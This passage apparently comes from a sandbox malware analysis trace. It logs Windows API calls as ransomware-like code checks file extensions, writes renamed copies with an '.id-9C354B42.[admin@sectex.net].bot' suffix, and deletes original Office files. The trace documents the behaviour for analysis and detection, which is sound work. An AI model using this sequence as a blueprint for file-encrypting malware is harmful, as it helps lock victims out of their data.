	[0145.923] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0145.923] lstrlenW (lpString=".rar") returned 4
	[0145.923] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0145.923] lstrlenW (lpString=".bz2") returned 4
	[0145.923] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0145.923] lstrlenW (lpString=".7z") returned 3
	[0145.923] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0145.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.923] lstrlenW (lpString=".dbf") returned 4
	[0145.923] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0145.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.923] lstrlenW (lpString=".1cd") returned 4
	[0145.923] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0145.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.923] lstrlenW (lpString=".jpg") returned 4
	[0145.923] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0145.923] lstrcmpiW (lpString1=".HXS", lpString2=".bot") returned 1
	[0145.923] lstrlenW (lpString="GROOVE.HXS") returned 10
	[0145.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.933] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2278416) returned 1
	[0145.933] CloseHandle (hObject=0x3ac) returned 1
	[0145.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs")) returned 0x20
	[0145.933] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.933] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove.hxs.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0145.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.933] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.933] lstrlenW (lpString=".doc") returned 4
	[0145.933] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0145.933] lstrlenW (lpString=".docx") returned 5
	[0145.933] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1
	[0145.933] lstrlenW (lpString=".pdf") returned 4
	[0145.933] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0145.933] lstrlenW (lpString=".xls") returned 4
	[0145.933] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0145.933] lstrlenW (lpString=".xlsx") returned 5
	[0145.934] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1
	[0145.934] lstrlenW (lpString=".ppt") returned 4
	[0145.934] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0145.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.934] lstrlenW (lpString=".zip") returned 4
	[0145.934] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0145.934] lstrlenW (lpString=".rar") returned 4
	[0145.934] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0145.934] lstrlenW (lpString=".bz2") returned 4
	[0145.934] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0145.934] lstrlenW (lpString=".7z") returned 3
	[0145.934] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0145.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.934] lstrlenW (lpString=".dbf") returned 4
	[0145.934] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0145.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.934] lstrlenW (lpString=".1cd") returned 4
	[0145.934] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0145.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.934] lstrlenW (lpString=".jpg") returned 4
	[0145.934] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0145.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.934] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.934] lstrlenW (lpString=".doc") returned 4
	[0145.934] lstrcmpiW (lpString1=".doc", lpString2=".HXS") returned -1
	[0145.934] lstrlenW (lpString=".docx") returned 5
	[0145.934] lstrcmpiW (lpString1=".docx", lpString2="E.HXS") returned -1
	[0145.934] lstrlenW (lpString=".pdf") returned 4
	[0145.934] lstrcmpiW (lpString1=".pdf", lpString2=".HXS") returned 1
	[0145.934] lstrlenW (lpString=".xls") returned 4
	[0145.934] lstrcmpiW (lpString1=".xls", lpString2=".HXS") returned 1
	[0145.934] lstrlenW (lpString=".xlsx") returned 5
	[0145.934] lstrcmpiW (lpString1=".xlsx", lpString2="E.HXS") returned -1
	[0145.935] lstrlenW (lpString=".ppt") returned 4
	[0145.935] lstrcmpiW (lpString1=".ppt", lpString2=".HXS") returned 1
	[0145.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.935] lstrlenW (lpString=".zip") returned 4
	[0145.935] lstrcmpiW (lpString1=".zip", lpString2=".HXS") returned 1
	[0145.935] lstrlenW (lpString=".rar") returned 4
	[0145.935] lstrcmpiW (lpString1=".rar", lpString2=".HXS") returned 1
	[0145.935] lstrlenW (lpString=".bz2") returned 4
	[0145.935] lstrcmpiW (lpString1=".bz2", lpString2=".HXS") returned -1
	[0145.935] lstrlenW (lpString=".7z") returned 3
	[0145.935] lstrcmpiW (lpString1=".7z", lpString2="HXS") returned -1
	[0145.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.935] lstrlenW (lpString=".dbf") returned 4
	[0145.935] lstrcmpiW (lpString1=".dbf", lpString2=".HXS") returned -1
	[0145.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.935] lstrlenW (lpString=".1cd") returned 4
	[0145.935] lstrcmpiW (lpString1=".1cd", lpString2=".HXS") returned -1
	[0145.935] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE.HXS") returned 58
	[0145.935] lstrlenW (lpString=".jpg") returned 4
	[0145.935] lstrcmpiW (lpString1=".jpg", lpString2=".HXS") returned 1
	[0145.935] lstrcmpiW (lpString1=".dll", lpString2=".bot") returned 1
	[0145.935] lstrlenW (lpString="GrooveIntlResource.dll") returned 22
	[0145.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.936] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=8794976) returned 1
	[0145.936] CloseHandle (hObject=0x3ac) returned 1
	[0145.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll")) returned 0x20
	[0145.936] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.936] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveintlresource.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0
	[0145.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.938] lstrlenW (lpString=".doc") returned 4
	[0145.938] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0145.938] lstrlenW (lpString=".docx") returned 5
	[0145.938] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1
	[0145.938] lstrlenW (lpString=".pdf") returned 4
	[0145.938] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0145.938] lstrlenW (lpString=".xls") returned 4
	[0145.938] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0145.938] lstrlenW (lpString=".xlsx") returned 5
	[0145.938] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1
	[0145.938] lstrlenW (lpString=".ppt") returned 4
	[0145.938] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0145.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.938] lstrlenW (lpString=".zip") returned 4
	[0145.938] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0145.938] lstrlenW (lpString=".rar") returned 4
	[0145.938] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0145.938] lstrlenW (lpString=".bz2") returned 4
	[0145.938] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0145.938] lstrlenW (lpString=".7z") returned 3
	[0145.938] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0145.938] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.938] lstrlenW (lpString=".dbf") returned 4
	[0145.939] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0145.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.939] lstrlenW (lpString=".1cd") returned 4
	[0145.939] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0145.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.939] lstrlenW (lpString=".jpg") returned 4
	[0145.939] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0145.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.939] lstrlenW (lpString=".doc") returned 4
	[0145.939] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1
	[0145.939] lstrlenW (lpString=".docx") returned 5
	[0145.939] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1
	[0145.939] lstrlenW (lpString=".pdf") returned 4
	[0145.939] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1
	[0145.939] lstrlenW (lpString=".xls") returned 4
	[0145.939] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1
	[0145.939] lstrlenW (lpString=".xlsx") returned 5
	[0145.939] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1
	[0145.939] lstrlenW (lpString=".ppt") returned 4
	[0145.939] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1
	[0145.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.939] lstrlenW (lpString=".zip") returned 4
	[0145.939] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1
	[0145.939] lstrlenW (lpString=".rar") returned 4
	[0145.939] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1
	[0145.939] lstrlenW (lpString=".bz2") returned 4
	[0145.939] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1
	[0145.939] lstrlenW (lpString=".7z") returned 3
	[0145.939] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1
	[0145.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.939] lstrlenW (lpString=".dbf") returned 4
	[0145.939] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1
	[0145.939] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.940] lstrlenW (lpString=".1cd") returned 4
	[0145.940] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1
	[0145.940] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveIntlResource.dll") returned 70
	[0145.940] lstrlenW (lpString=".jpg") returned 4
	[0145.940] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1
	[0145.940] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0145.940] lstrlenW (lpString="GROOVE_COL.HXC") returned 14
	[0145.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.960] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=626) returned 1
	[0145.960] CloseHandle (hObject=0x3ac) returned 1
	[0145.960] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc")) returned 0x20
	[0145.961] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.961] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.961] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.961] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.973] GetLastError () returned 0x0
	[0145.973] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x272, lpOverlapped=0x0) returned 1
	[0145.974] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0145.975] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.975] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0145.975] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.975] CloseHandle (hObject=0x3d4) returned 1
	[0145.975] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.976] SetEndOfFile (hFile=0x3ac) returned 1
	[0145.978] CloseHandle (hObject=0x3ac) returned 1
	[0145.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.978] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxc")) returned 1
	[0145.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.978] lstrlenW (lpString=".doc") returned 4
	[0145.979] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0145.979] lstrlenW (lpString=".docx") returned 5
	[0145.979] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0145.979] lstrlenW (lpString=".pdf") returned 4
	[0145.979] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0145.979] lstrlenW (lpString=".xls") returned 4
	[0145.979] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0145.979] lstrlenW (lpString=".xlsx") returned 5
	[0145.979] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0145.979] lstrlenW (lpString=".ppt") returned 4
	[0145.979] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0145.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.979] lstrlenW (lpString=".zip") returned 4
	[0145.979] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0145.979] lstrlenW (lpString=".rar") returned 4
	[0145.979] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0145.979] lstrlenW (lpString=".bz2") returned 4
	[0145.979] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0145.979] lstrlenW (lpString=".7z") returned 3
	[0145.979] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0145.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.979] lstrlenW (lpString=".dbf") returned 4
	[0145.979] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0145.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.979] lstrlenW (lpString=".1cd") returned 4
	[0145.979] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0145.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.979] lstrlenW (lpString=".jpg") returned 4
	[0145.979] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0145.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.979] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.979] lstrlenW (lpString=".doc") returned 4
	[0145.979] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0145.980] lstrlenW (lpString=".docx") returned 5
	[0145.980] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0145.980] lstrlenW (lpString=".pdf") returned 4
	[0145.980] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0145.980] lstrlenW (lpString=".xls") returned 4
	[0145.980] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0145.980] lstrlenW (lpString=".xlsx") returned 5
	[0145.980] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0145.980] lstrlenW (lpString=".ppt") returned 4
	[0145.980] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0145.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.980] lstrlenW (lpString=".zip") returned 4
	[0145.980] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0145.980] lstrlenW (lpString=".rar") returned 4
	[0145.980] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0145.980] lstrlenW (lpString=".bz2") returned 4
	[0145.980] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0145.980] lstrlenW (lpString=".7z") returned 3
	[0145.980] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0145.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.980] lstrlenW (lpString=".dbf") returned 4
	[0145.980] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0145.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.980] lstrlenW (lpString=".1cd") returned 4
	[0145.980] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0145.980] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXC") returned 62
	[0145.980] lstrlenW (lpString=".jpg") returned 4
	[0145.980] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0145.980] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0145.980] lstrlenW (lpString="GROOVE_COL.HXT") returned 14
	[0145.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.981] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=218) returned 1
	[0145.981] CloseHandle (hObject=0x3ac) returned 1
	[0145.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt")) returned 0x20
	[0145.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.981] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.982] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0145.982] GetLastError () returned 0x0
	[0145.982] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xda, lpOverlapped=0x0) returned 1
	[0145.983] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0145.984] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.984] WriteFile (in: hFile=0x3d4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0145.984] SetEndOfFile (hFile=0x3d4) returned 1
	[0145.984] CloseHandle (hObject=0x3d4) returned 1
	[0145.984] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.984] SetEndOfFile (hFile=0x3ac) returned 1
	[0145.987] CloseHandle (hObject=0x3ac) returned 1
	[0145.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.987] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt")) returned 1
	[0145.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.987] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62
	[0145.987] lstrlenW (lpString=".doc") returned 4
	[0145.987] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0145.988] lstrlenW (lpString=".docx") returned 5
	[0145.988] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0145.988] lstrlenW (lpString=".pdf") returned 4
	[0145.988] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0145.988] lstrlenW (lpString=".xls") returned 4
	[0145.988] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
